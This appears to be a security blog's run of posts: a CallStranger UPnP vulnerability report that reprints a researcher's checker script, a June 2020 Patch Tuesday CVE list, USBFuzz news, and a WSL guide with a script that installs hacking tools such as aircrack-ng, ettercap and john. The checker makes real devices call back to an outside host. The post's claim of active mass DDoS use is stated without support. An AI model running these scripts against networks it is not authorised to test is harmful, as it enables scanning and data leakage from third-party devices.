Posted on

New CallStranger exploit takes advantage of UPnP vulnerability in millions of routers, gaming systems, TVs, printers, and other Internet-connected attachable devices.

New CallStranger exploit takes advantage of UPnP vulnerability

Researchers just announced the discovery of a UPnP vulnerability that impacts any UPnP device exposed on the Internet. The attack, called CallStranger (CVE-2020-12695), is being used for massive DDoS attacks , to exfiltrate data, and to scan ports from Internet-facing UPnP devices.

How the CallStranger exploit works

The attack takes advantage of a Callback header value in the SUBSCRIBE function so you can block all SUBSCRIBE and NOTIFY HTTP packets in ingress and egress traffic for protection. DDoS protection can be configured to block NOTIFY packets too.

You can also disable UPnP services on cameras, printers, routers, and other connected devices if the product provides the means to do so. Some products also list UPnP ports used. If so, you could block those too (or use Nmap to discover the open ports if no documentation is available).

SUBSCRIBE publisher_path HTTP/1.1
HOST: publisher_host:publisher_port
CALLBACK:
NT: upnp:event
TIMEOUT: Second-requested subscription duration

Researchers were able to confirm the following devices are susceptible to attack. They are waiting confirmation on another 14 devices. Thus far in their testing, only 2 devices have been found to not be vulnerable.

  • Windows 10 (Probably all Windows versions including servers) – upnphost.dll 10.0.18362.719
  • Xbox One- OS Version 10.0.19041.2494
  • ADB TNR-5720SX Box (TNR-5720SX/v16.4-rc-371-gf5e2289 UPnP/1.0 BH-upnpdev/2.0)
  • Asus ASUS Media Streamer
  • Asus RT-N66U Firmware: 3.0.0.4.382_51640-g679a7e3
  • Asus Rt-N11
  • Belkin WeMo
  • Broadcom ADSL Modems
  • Canon Canon SELPHY CP1200 Printer
  • Cisco X1000 – (LINUX/2.4 UPnP/1.0 BRCM400/1.0)
  • Cisco X3500 – (LINUX/2.4 UPnP/1.0 BRCM400/1.0)
  • D-Link DVG-N5412SP WPS Router (OS 1.0 UPnP/1.0 Realtek/V1.3)
  • EPSON EP, EW, XP Series (EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0)
  • HP Deskjet, Photosmart, Officejet ENVY Series (POSIX, UPnP/1.0, Intel MicroStack/1.0.1347)
  • Huawei HG255s Router – Firmware HG255sC163B03 (ATP UPnP Core)
  • JRiver DLNA Server 19.0.163 (Windows, UPnP/1.1 DLNADOC/1.50, JRiver/19)
  • NEC AccessTechnica WR8165N Router ( OS 1.0 UPnP/1.0 Realtek/V1.3)
  • Philips 2k14MTK TV – Firmware TPL161E_012.003.039.001
  • Samsung UE55MU7000 TV – Firmware T-KTMDEUC-1280.5, BT – S
  • Samsung MU8000 TV
  • TP-Link TL-WA801ND (Linux/2.6.36, UPnP/1.0, Portable SDK for UPnP devices/1.6.19)
  • TP-Link Archer VR200 (Linux/2.6.32.42, UPnP/1.0, Portable SDK for UPnP devices/1.6.19)
  • Trendnet TV-IP551W (OS 1.0 UPnP/1.0 Realtek/V1.3)
  • Zyxel VMG8324-B10A (LINUX/2.6 UPnP/1.0 BRCM400-UPnP/1.0)

Here is a script that can scan subnets for the vulnerability.

import os
import sys, getopt
import upnpy
import requests
import uuid
import socket
import cryptography
import time
from cryptography.fernet import Fernet
from sys import platform
from termcolor import colored, cprint

if(sys.platform=='win32'):
	os.system('color')

print('This script created by Yunus Çadırcı (https://twitter.com/yunuscadirci) to check against CallStranger (CVE-2020-12695) vulnerability. An attacker can use this vulnerability for:')
print('* Bypassing DLP for exfiltrating data')
print('* Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood')
print('* Scanning internal ports from Internet facing UPnP devices')
print('You can find detailed information on https://www.callstranger.com  https://kb.cert.org/vuls/id/339275 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12695')
print('Slightly modified version of https://github.com/5kyc0d3r/upnpy used for base UPnP communication')

def subscribe(URL,callbackURL):
	myheaders = {
	'User-Agent':'Callstranger Vulnerability Checker',
    'CALLBACK': '<'+callbackURL+'>',
    'NT': 'upnp:event',
    'TIMEOUT': 'Second-300'} 
	#print(URL,callbackURL,'sending')
	req = requests.request('SUBSCRIBE', URL,headers=myheaders)
	if req.status_code==200:
		print(colored('Subscribe to '+URL+' seems successfull','green'))
		print(req.headers)
		print(req.text)
	else:
		print(colored('Subscribe to '+URL+' failed with status code:'+str(req.status_code),'red'))
		print(req.headers)
		print(req.text)
	
def getsession(path):
	session=''
	try:
		getses=requests.request('PUT',path)
		session=getses.text
		print(colored('Successfully get session:'+session,'green'))
	except:
		print(colored('Could not  contact server',path,' for vulnerability confirmation','red'))
	return session
	
def confirmvulnerableservices(path,key):
	vulnerableservices=''
	try:
		getservices=requests.request('PUT',path)
		vulnerableservices=getservices.text
		print(colored('Successfully get services from server: '+path,'green'))
		print('')
		print('Encrypted vulnerable services:')
		print(vulnerableservices);
		print('')
		print('Decyripting vulnerable services with key:' , key)
		f = Fernet(key)
		i=1
		decryiptedvulnerableservices=[]
		print(colored('\nVerified vulnerable services: ','red'))
		for line in vulnerableservices.splitlines():
			print(colored(str(i)+':	'+f.decrypt(line.encode()).decode(),'red'))
			decryiptedvulnerableservices.append(f.decrypt(line.encode()).decode())
			i=i+1
			
		unverifiedservices=Diff(services,decryiptedvulnerableservices)
		
		print(colored('\nUnverified  services: ','yellow'))
		i=1
		for unverifiedservice in unverifiedservices:
			print(colored(str(i)+':	'+unverifiedservice,'yellow'))
			i=i+1
	except:
		print(colored('Could not get services from server',path,' for vulnerability confirmation','red'))

def Diff(li1, li2): 
    li_dif = [i for i in li1 + li2 if i not in li1 or i not in li2] 
    return li_dif 

services=[]
serviceeventSubURLs=[]
dummyservicekeywords=['dummy','notfound']
# this host must be external so you can be sure that devices are vulnerable. Most of UPnP stacks don't allow hostname. use IP if possible
StrangerHost='http://'+socket.gethostbyname('verify.callstranger.com')
StrangerPort='80'
getSessionPath='/CallStranger.php?c=getsession'
putServicePath='/CallStranger.php?c=addservice&service=' # this HTTP request verb is NOTIFY , your web server must respond to NOTIFY
getVulnerableServicesPath='/CallStranger.php?c=getservices'
print('Stranger Host:',StrangerHost)
print('Stranger Port:',StrangerPort)

upnp = upnpy.UPnP()

# Discover UPnP devices on the network

devices = upnp.discover()
if len(devices)>0:
	print(colored(len(devices),'blue') , colored(' devices found:','blue'))

	for device in devices:
		print('\n',colored(device.friendly_name,'yellow') ,device.base_url,'(',device.document_location,')')
		tmpservices=device.get_services()
		print(colored('\n  ' +str(len(tmpservices)) + ' service(s) found for '+device.friendly_name,'yellow'))
		for tmpservice in tmpservices:
			print('    ',tmpservice.service, "	-->",device.base_url+tmpservice.event_sub_url,  )
			if any(x in  tmpservice.event_sub_url for x in dummyservicekeywords):
				print('     --skipping ',device.base_url+tmpservice.event_sub_url ,'because it contains dummy service keywords')
			else:
				services.append(device.base_url+tmpservice.event_sub_url)
			
	print('\n','Total', len(services), 'service(s) found. do you want to continue to VERIFY if service(s) are vulnerable?')
	print(colored('Be careful: This operation needs Internet access and may transfer data about devices over network. Data encrypted on local and we can not see which services are vulnerable but ISPs and other elements may be able to inspect HTTP headers created by UPnP device. Because most of UPnPstack do not allow SSL connection we can not use it. ','red'))
	if input('Do you want to continue? y/N ') == 'y':
		ss=getsession(StrangerHost+':'+StrangerPort+getSessionPath)
		key = Fernet.generate_key()
		f=Fernet(key)
		print('Symmetric random key for encryption:',key,' We do not send this value to server so we can not see which services are vulnerable. All confirmation process is done on client side' )
		for serv in services:
			path=StrangerHost+':'+StrangerPort+putServicePath+f.encrypt(serv.encode()).decode()+'&token='+ss
			print('Calling stranger for ', serv, 'with',path)
			subscribe(serv,path)
			
		print(colored('\n	Waiting 5 second for asynchronous requests','yellow'))
		time.sleep(5) 
		vulnerabilityconfirmationpath=StrangerHost+':'+StrangerPort+getVulnerableServicesPath+'&token='+ss
		confirmvulnerableservices(vulnerabilityconfirmationpath,key)
else:
	print( colored('No UPnP device found. Possible reasons: ','yellow'))
	print( colored('* You just connected to network.','yellow'))
	print( colored('* UPnP stack is too slow. Restart this script','yellow'))
	print( colored('* UPnP is disabled on OS.','yellow'))
	print( colored('* UPnP is disabled on devices.','yellow'))
	print( colored('* There is no UPnP supported device.','yellow'))
	print( colored('* Your OS works on VM with NAT configuration.','yellow'))

Sources: GitHub/CallStranger

Posted on

Microsoft’s Patch Tuesday breaks record with 129 patches including CVEs for 11 critical remote-code execution vulnerabilities.

image thumb31

If you’re computer took forever to reboot, here’s why. Microsoft rolled out patches for a whopping 129 vulnerabilities in June’s Patch Tuesday. The patches covered vulnerabilities in Windows 10, Office, Microsoft Edge, and other Microsoft software. It marked the 4th month in a row that MS released patches for more than 110 CVEs. MS has already patched 616 CVEs – and it’s only June!

One patch in particular, CVE-2020-1299 in Windows 10, stands out from the rest as it could allow remote code execution when a .LNK file, which is a shortcut or “link”, is processed. If an attacker were to embed a malicious shortcut in a removable drive or remote share and convince a user to open it, then the malicious binary will be able to execute code.

Here’s the full list.

CVETitleSeverityPublicExploitedXI – LatestXI – OlderType
CVE-2020-1248GDI+ Remote Code Execution VulnerabilityCriticalNoNo22RCE
CVE-2020-1299LNK Remote Code Execution VulnerabilityCriticalNoNo22RCE
CVE-2020-1219Microsoft Browser Memory Corruption VulnerabilityCriticalNoNo11RCE
CVE-2020-1181Microsoft SharePoint Server Remote Code Execution VulnerabilityCriticalNoNo22RCE
CVE-2020-1073Scripting Engine Memory Corruption VulnerabilityCriticalNoNo22RCE
CVE-2020-1213VBScript Remote Code Execution VulnerabilityCriticalNoNo11RCE
CVE-2020-1216VBScript Remote Code Execution VulnerabilityCriticalNoNo11RCE
CVE-2020-1260VBScript Remote Code Execution VulnerabilityCriticalNoNo11RCE
CVE-2020-1281Windows OLE Remote Code Execution VulnerabilityCriticalNoNo22RCE
CVE-2020-1300Windows Remote Code Execution VulnerabilityCriticalNoNo22RCE
CVE-2020-1286Windows Shell Remote Code Execution VulnerabilityCriticalNoNo22RCE
CVE-2020-1311Component Object Model Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1211Connected Devices Platform Service Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1120Connected User Experiences and Telemetry Service Denial of Service VulnerabilityImportantNoNo22DoS
CVE-2020-1244Connected User Experiences and Telemetry Service Denial of Service VulnerabilityImportantNoNo22DoS
CVE-2020-1202Diagnostic Hub Standard Collector Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1203Diagnostic Hub Standard Collector Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1257Diagnostics Hub Standard Collector Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1278Diagnostics Hub Standard Collector Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1293Diagnostics Hub Standard Collector Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1317Group Policy Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1315Internet Explorer Information Disclosure VulnerabilityImportantNoNo22Info
CVE-2020-1208Jet Database Engine Remote Code Execution VulnerabilityImportantNoNo22RCE
CVE-2020-1236Jet Database Engine Remote Code Execution VulnerabilityImportantNoNo22RCE
CVE-2020-1232Media Foundation Information Disclosure VulnerabilityImportantNoNo22Info
CVE-2020-1238Media Foundation Memory Corruption VulnerabilityImportantNoNo22RCE
CVE-2020-1239Media Foundation Memory Corruption VulnerabilityImportantNoNo22RCE
CVE-2020-1329Microsoft Bing Search Spoofing VulnerabilityImportantNoNo22Spoof
CVE-2020-1220Microsoft Edge (Chromium-based) in IE Mode Spoofing VulnerabilityImportantNoNo22Spoof
CVE-2020-1242Microsoft Edge Information Disclosure VulnerabilityImportantNoNo22Info
CVE-2020-1225Microsoft Excel Remote Code Execution VulnerabilityImportantNoNo22RCE
CVE-2020-1226Microsoft Excel Remote Code Execution VulnerabilityImportantNoNo22RCE
CVE-2020-1160Microsoft Graphics Component Information Disclosure VulnerabilityImportantNoNo22Info
CVE-2020-1321Microsoft Office Remote Code Execution VulnerabilityImportantNoNo22RCE
CVE-2020-1177Microsoft Office SharePoint XSS VulnerabilityImportantNoNo22XSS
CVE-2020-1183Microsoft Office SharePoint XSS VulnerabilityImportantNoNo22XSS
CVE-2020-1297Microsoft Office SharePoint XSS VulnerabilityImportantNoNo22XSS
CVE-2020-1298Microsoft Office SharePoint XSS VulnerabilityImportantNoNo22XSS
CVE-2020-1318Microsoft Office SharePoint XSS VulnerabilityImportantNoNo22XSS
CVE-2020-1320Microsoft Office SharePoint XSS VulnerabilityImportantNoNo22XSS
CVE-2020-1229Microsoft Outlook Security Feature Bypass VulnerabilityImportantNoNo22SFB
CVE-2020-1322Microsoft Project Information Disclosure VulnerabilityImportantNoNo22Info
CVE-2020-1295Microsoft SharePoint Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1178Microsoft SharePoint Server Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1148Microsoft SharePoint Spoofing VulnerabilityImportantNoNo22Spoof
CVE-2020-1289Microsoft SharePoint Spoofing VulnerabilityImportantNoNo22Spoof
CVE-2020-1222Microsoft Store Runtime Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1309Microsoft Store Runtime Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1163Microsoft Windows Defender Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1170Microsoft Windows Defender Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1340NuGetGallery Spoofing VulnerabilityImportantNoNo22Spoof
CVE-2020-1212OLE Automation Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1292OpenSSH for Windows Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1323SharePoint Open Redirect VulnerabilityImportantNoNo22Spoof
CVE-2020-1331System Center Spoofing VulnerabilityImportantNoNo22Spoof
CVE-2020-1327Team Foundation Server HTML Injection VulnerabilityImportantNoNo22Spoof
CVE-2020-1214VBScript Remote Code Execution VulnerabilityImportantNoNo11RCE
CVE-2020-1215VBScript Remote Code Execution VulnerabilityImportantNoNo11RCE
CVE-2020-1230VBScript Remote Code Execution VulnerabilityImportantNoNo11RCE
CVE-2020-1343Visual Studio Code Information Disclosure VulnerabilityImportantNoNo22Info
CVE-2020-1207Win32k Elevation of Privilege VulnerabilityImportantNoNo11EoP
CVE-2020-1247Win32k Elevation of Privilege VulnerabilityImportantNoNo11EoP
CVE-2020-1251Win32k Elevation of Privilege VulnerabilityImportantNoNo11EoP
CVE-2020-1253Win32k Elevation of Privilege VulnerabilityImportantNoNo11EoP
CVE-2020-1258Win32k Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1310Win32k Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1290Win32k Information Disclosure VulnerabilityImportantNoNo22Info
CVE-2020-1255Windows Background Intelligent Transfer Service Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1271Windows Backup Service Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1280Windows Bluetooth Service Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1283Windows Denial of Service VulnerabilityImportantNoNo22DoS
CVE-2020-1296Windows Diagnostics & feedback Information Disclosure VulnerabilityImportantNoNo22Info
CVE-2020-1162Windows Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1324Windows Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1234Windows Error Reporting Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1261Windows Error Reporting Information Disclosure VulnerabilityImportantNoNo22Info
CVE-2020-1263Windows Error Reporting Information Disclosure VulnerabilityImportantNoNo22Info
CVE-2020-1197Windows Error Reporting Manager Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1199Windows Feedback Hub Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-0915Windows GDI Elevation of Privilege VulnerabilityImportantNo*No22EoP
CVE-2020-0916Windows GDI Elevation of Privilege VulnerabilityImportantNo*No22EoP
CVE-2020-1348Windows GDI Information Disclosure VulnerabilityImportantNoNo22Info
CVE-2020-1259Windows Host Guardian Service Security Feature Bypass VulnerabilityImportantNoNo22SFB
CVE-2020-1272Windows Installer Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1277Windows Installer Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1302Windows Installer Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1312Windows Installer Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-0986Windows Kernel Elevation of Privilege VulnerabilityImportantNo*No22EoP
CVE-2020-1237Windows Kernel Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1246Windows Kernel Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1262Windows Kernel Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1264Windows Kernel Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1266Windows Kernel Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1269Windows Kernel Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1273Windows Kernel Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1274Windows Kernel Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1275Windows Kernel Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1276Windows Kernel Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1307Windows Kernel Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1316Windows Kernel Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1241Windows Kernel Security Feature Bypass VulnerabilityImportantNoNo11SFB
CVE-2020-1279Windows Lockscreen Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1204Windows Mobile Device Management Diagnostics Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1254Windows Modules Installer Service Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1291Windows Network Connections Service Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1209Windows Network List Service Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1201Windows Now Playing Session Manager Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1196Windows Print Configuration Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1194Windows Registry Denial of Service VulnerabilityImportantNoNo22DoS
CVE-2020-1231Windows Runtime Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1233Windows Runtime Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1235Windows Runtime Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1265Windows Runtime Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1282Windows Runtime Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1304Windows Runtime Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1306Windows Runtime Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1334Windows Runtime Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1217Windows Runtime Information Disclosure VulnerabilityImportantNoNo22Info
CVE-2020-1268Windows Service Information Disclosure VulnerabilityImportantNoNo22Info
CVE-2020-1301Windows SMB Remote Code Execution VulnerabilityImportantNoNo11RCE
CVE-2020-1284Windows SMBv3 Client/Server Denial of Service VulnerabilityImportantNoNo11DoS
CVE-2020-1206Windows SMBv3 Client/Server Information Disclosure VulnerabilityImportantNoNo11Info
CVE-2020-1305Windows State Repository Service Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1314Windows Text Service Framework Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1313Windows Update Orchestrator Service Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1287Windows WalletService Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1294Windows WalletService Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1270Windows WLAN Service Elevation of Privilege VulnerabilityImportantNoNo22EoP
CVE-2020-1223Word for Android Remote Code Execution VulnerabilityImportantNoNo22RCE
CVEs released by Microsoft for June 2020

Posted on

Forget the 26 new USB bugs found in Linux and Windows, it’s the security fuzzer tool that discovered them that’s the news.

SanDisk Cruzer USB 4GB ThumbDrive

A research team from Purdue University has created a tool, USBFuzz, which fuzzes calls to the USB driver stack. Apparently the tool is pretty groundbreaking. The researchers said,

“At its core, USBFuzz uses a software-emulated USB device to provide random device data to drivers (when they perform IO operations).”

The researchers tested the tool on:

  • 9 recent versions of the Linux kernel: v4.14.81, v4.15,v4.16, v4.17, v4.18.19, v4.19, v4.19.1, v4.19.2, and v4.20-rc2 (the latest version at the time of evaluation)
  • FreeBSD 12 (the latest release)
  • MacOS 10.15 Catalina (the latest release)
  • Windows (both version 8 and 10, with most recent security updates installed)

In total, they found 26 new bugs. They discovered one new bug in FreeBSD, three in MacOS (one of which froze the system), four in Windows 8 and 10 (producing BSOD), and get this, 18 in Linux. Sixteen of the Linux bugs were “memory bugs of high-security impact in various Linux subsystems”. Of the 18 Linux bugs, 11 received a CVE and have already been patched.

The team’s research results will be presented at the Usenix Security Symposium virtual security conference in August 2020. Then USBFuzz will be open-sourced and released to the public.

Posted on Leave a comment

Windows Subsystem for Linux (WSL) – how to create a Linux hacking toolkit that runs on Windows 10

image thumb 4 1

Windows 10/Ubuntu logos - YouTube

Forget running Kali in a virtual machine (well, at least put it aside for a while). The Windows 10 Anniversary Update includes a whack new feature – Windows Subsystem for Linux or WSL.  Using the new LxssManager service, WSL lets you run a full-featured Ubuntu Linux subsystem on Windows 10.  As Microsoft says,

“The LXSS Manager supports running native ELF binaries.”

Pick yourself up off the floor.  That means a cool little Linux console window and the ability to use APT to install all your favorite Linux hacking tools. The subsystem is kept separate from the Windows core OS which is a plus (however, you can still access your root Windows drive under /mnt).  Even better,  the home directory is maintained even when you uninstall/install the system so you can wipe the system and start anew without losing anything.

Heads up though, it’s marked “beta” and although it seems much cleaner than you’d expect from a beta product, there are some things that don’t work – ICMP and raw sockets for instance. This means one of your favorite hacking tools, nmap, won’t run correctly. I’ve heard however, that this has been given a high priority with MS developers so hopefully we see a fully-functioning, comprehensive networking system very soon.

How to install Windows Subsystem for Linux (WSL)

To get started with Windows Subsystem for Linux (WSL), first install the Windows feature (Control Panel – Programs and Features – Turn Windows features on or off).

Screenshot showing Windows 10 new Windows Subsystem for Linux (Beta) WSL

Next, reboot the computer to initialize and start the newly installed LxssManager service..

Then click Start and type “bash”. Within the console window, you will be prompted to accept a license agreement. Press “y”. The subsystem will download from the Windows Store (actually, it says it’s downloading from the Windows Store but it’s really coming off of MS cloud servers), extract, and install. Once the installation is complete, it will prompt you for a new Unix username and password.

Once the linux subsystem is installed, search for “bash” again and you’ll see the new Bash application with a nice little Ubuntu-like icon.  Pin it to your start menu or your task bar and right-click to set properties (e.g. font size, window size, colors, etc.)  Open a bash shell window or two and start installing your tools using apt.

Below is a bash shell script you can copy to your home directory, chmod to 700, and run to install a starting set of utilities.  Remember, if you save this in your home directory, it’ll be retained even when you reinstall the Linux subsystem.

Shell script to install basic hacking utilities in Windows Subsystem for Linux

Windows Subsystem for Linux (WSL) screenshotThis script will install some basic hacking utilities including w3af (including python), git, and katoolin (Kali linux repository utility), and the basics needed for a private VPN service and Metasploit.  Don’t forget to chmod 700 the script first.  Then run with sudo ./YOUR_SCRIPT_FILE.sh.

#!/bin/bash

sudo apt-get update

sudo apt-get upgrade

sudo apt-get dist-upgrade

sudo apt-get install nmap

sudo apt-get install netcat

sudo apt-get install aircrack-ng

sudo apt-get install dsniff

sudo apt-get install ettercap-text-only

sudo apt-get install w3af

sudo apt-get install kismet

sudo apt-get install scapy

sudo apt-get install john

sudo apt-get install unzip

sudo apt-get install nikto

sudo apt-get install tor

sudo apt-get install git

sudo git clone https://github.com/LionSec/katoolin.git

sudo cp katoolin/katoolin.py /usr/bin/katoolin

sudo chmod ugo+x /usr/bin/katoolin

sudo apt-get install network-manager-openvpn network-manager

sudo apt-get install build-essential libssl-dev libreadline-dev libpq5 libpq-dev libreadline5 libpcap-dev openjdk-7-jre git-core autoconf postgresql libsqlite3-dev pgadmin3 curl zlib1g-dev libxml2-dev curl zlib1g-dev libxslt1-dev vncviewer libyaml-dev

Katoolin is included in the above installation script.  To start katoolin, type “sudo kataoolin”.  Katoolin lets you install packages from the official Kali Linux repository.  As with nmap, not all packages will work in WSL.  In Katoolin, select 1 and press enter to update the repository.  Then select option 2 (view categories) to pick a category and install utilities from the selected category.

Other Linux utilities you may want to install

Here are a few more Linux applications you may wish to install.

Install all the C/C++ build utilities.

sudo apt install build-essential

Install curses for advanced console screen interaction (needed for some text-based games).

sudo apt install libncurses-dev

Grab all the python utilities including pip.

sudo apt install python-pip python-dev
sudo pip install --upgrade pip

Install a improved process monitor – htop.

sudo apt-get install htop

Change the bash color scheme

You can get rid of the mediocre Windows 10 bash color scheme by replacing the bashrc file.  Rename the old file.

cd /etc

sudo mv bash.bashrc bash.bashrc_bkp

Then create a new bashrc file in the /etc directory.

sudo vi bash.bashrc

And paste this code into it.

# /etc/bash.bashrc
#
# https://wiki.archlinux.org/index.php/Color_Bash_Prompt
#
# This file is sourced by all *interactive* bash shells on startup,
# including some apparently interactive shells such as scp and rcp
# that can't tolerate any output. So make sure this doesn't display
# anything or bad things will happen !

# Test for an interactive shell. There is no need to set anything
# past this point for scp and rcp, and it's important to refrain from
# outputting anything in those cases.

# If not running interactively, don't do anything!
[[ $- != *i* ]] && return

# Bash won't get SIGWINCH if another process is in the foreground.
# Enable checkwinsize so that bash will check the terminal size when
# it regains control.
# http://cnswww.cns.cwru.edu/~chet/bash/FAQ (E11)
shopt -s checkwinsize

# Enable history appending instead of overwriting.
shopt -s histappend

case ${TERM} in
 xterm*|rxvt*|Eterm|aterm|kterm|gnome*)
 PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'printf "\033]0;%s@%s:%s\007" "${USER}" "${HOSTNAME%%.*}" "${PWD/#$HOME/~}"'
 ;;
 screen)
 PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'printf "\033_%s@%s:%s\033\\" "${USER}" "${HOSTNAME%%.*}" "${PWD/#$HOME/~}"'
 ;;
esac

# fortune is a simple program that displays a pseudorandom message
# from a database of quotations at logon and/or logout.
# If you wish to use it, please install "fortune-mod" from the
# official repositories, then uncomment the following line:

# [[ "$PS1" ]] && /usr/bin/fortune

# Set colorful PS1 only on colorful terminals.
# dircolors --print-database uses its own built-in database
# instead of using /etc/DIR_COLORS. Try to use the external file
# first to take advantage of user additions. Use internal bash
# globbing instead of external grep binary.

# sanitize TERM:
safe_term=${TERM//[^[:alnum:]]/?}
match_lhs=""

[[ -f ~/.dir_colors ]] && match_lhs="${match_lhs}$(<~/.dir_colors)"
[[ -f /etc/DIR_COLORS ]] && match_lhs="${match_lhs}$(</etc/DIR_COLORS)"
[[ -z ${match_lhs} ]] \
 && type -P dircolors >/dev/null \
 && match_lhs=$(dircolors --print-database)

if [[ $'\n'${match_lhs} == *$'\n'"TERM "${safe_term}* ]] ; then
 
 # we have colors :-)

# Enable colors for ls, etc. Prefer ~/.dir_colors
 if type -P dircolors >/dev/null ; then
 if [[ -f ~/.dir_colors ]] ; then
 eval $(dircolors -b ~/.dir_colors)
 elif [[ -f /etc/DIR_COLORS ]] ; then
 eval $(dircolors -b /etc/DIR_COLORS)
 fi
 fi

PS1="$(if [[ ${EUID} == 0 ]]; then echo '\[\033[01;31m\]\h'; else echo '\[\033[01;32m\]\u@\h'; fi)\[\033[01;34m\] \w \$([[ \$? != 0 ]] && echo \"\[\033[01;31m\]:(\[\033[01;34m\] \")\\$\[\033[00m\] "

# Use this other PS1 string if you want \W for root and \w for all other users:
 # PS1="$(if [[ ${EUID} == 0 ]]; then echo '\[\033[01;31m\]\h\[\033[01;34m\] \W'; else echo '\[\033[01;32m\]\u@\h\[\033[01;34m\] \w'; fi) \$([[ \$? != 0 ]] && echo \"\[\033[01;31m\]:(\[\033[01;34m\] \")\\$\[\033[00m\] "

alias ls="ls --color=auto"
 alias dir="dir --color=auto"
 alias grep="grep --color=auto"
 alias dmesg='dmesg --color'

# Uncomment the "Color" line in /etc/pacman.conf instead of uncommenting the following line...!

# alias pacman="pacman --color=auto"

else

# show root@ when we do not have colors

PS1="\u@\h \w \$([[ \$? != 0 ]] && echo \":( \")\$ "

# Use this other PS1 string if you want \W for root and \w for all other users:
 # PS1="\u@\h $(if [[ ${EUID} == 0 ]]; then echo '\W'; else echo '\w'; fi) \$([[ \$? != 0 ]] && echo \":( \")\$ "

fi

PS2="> "
PS3="> "
PS4="+ "

# Try to keep environment pollution down, EPA loves us.
unset safe_term match_lhs

# Try to enable the auto-completion (type: "pacman -S bash-completion" to install it).
[ -r /usr/share/bash-completion/bash_completion ] && . /usr/share/bash-completion/bash_completion

# Try to enable the "Command not found" hook ("pacman -S pkgfile" to install it).
# See also: https://wiki.archlinux.org/index.php/Bash#The_.22command_not_found.22_hook
[ -r /usr/share/doc/pkgfile/command-not-found.bash ] && . /usr/share/doc/pkgfile/command-not-found.bash

Exit the vi editor and write the file using:

:wq

Then in the /etc directory, create a file /etc/DIR_COLORS and paste in these contents:

# Configuration file for the color ls utility
# This file goes in the /etc directory, and must be world readable.
# You can copy this file to .dir_colors in your $HOME directory to override
# the system defaults.

# COLOR needs one of these arguments: 'tty' colorizes output to ttys, but not
# pipes. 'all' adds color characters to all output. 'none' shuts colorization
# off.
COLOR all

# Extra command line options for ls go here.
# Basically these ones are:
# -F = show '/' for dirs, '*' for executables, etc.
# -T 0 = don't trust tab spacing when formatting ls output.
OPTIONS -F -T 0

